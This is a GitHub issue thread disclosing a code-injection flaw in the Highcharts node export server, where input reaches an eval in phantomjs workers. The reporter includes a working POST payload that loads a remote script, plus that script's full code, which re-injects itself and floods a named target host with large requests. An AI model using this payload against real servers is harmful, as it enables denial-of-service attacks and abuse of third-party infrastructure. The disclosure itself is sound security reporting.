### ISSUE TITLE
Highcharts uses vulnerable component phantomjs

### ISSUE THREAD

**Issue by hexrays4711** [highcharts/highcharts#10459]
#### Expected behaviour
Highcharts export server passes input to phantomjs workers without sanitization. Highcharts should sanitize input for dangerous javascript tags to prevent vulnerabilities in phantomjs to manifest.

#### Actual behaviour
Post request
{"infile":"document.write('<iframe src=\"http://site.org/script.html\"></iframe>')", "async":true}

triggers the execution of the javascript from the server side because of an eval statement  in worker.js. 

Sample script code  for performing conncection floods or post-request floods is available.
Highcharts export server fertilizes botnet and DDOS attacks because of this behaviour.

#### Live demo with steps to reproduce
Post request:
{"infile":"document.write('<iframe src=\"http://site.org/script.html\"></iframe>')", "async":true}

with script.html containing
<HTML>

<BODY>
<script>

i=0;

var A="A";

for (i=0;i<18;i=i+1)
        A=A+A;

do {
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://localhost:7801/', true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.send("{\"infile\":\"document.write('<iframe src=\\\"http://site.org/script.html\\\"></iframe>')\", \"async\":true}");

xhr = new XMLHttpRequest();
xhr.open("GET", 'http://site_to_dos.org:80/', true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.send(A);
xhr.close();
i=i+1;
} while (i<1000);
</script>

#### Product version

Latest highcharts export server (v2.0.16)

#### Affected browser(s)
Independent of browsers.

**Comment by KacperMadej** [comment]
Hi @hexrays4711 

Thank you for reporting about this problem with the node export server.
There's a dedicated repository for that code. Please move the issue there --> https://github.com/highcharts/node-export-server/issues

**Comment by hexrays4711** [comment]
Issue has been copied to https://github.com/highcharts/node-export-server/issues/192
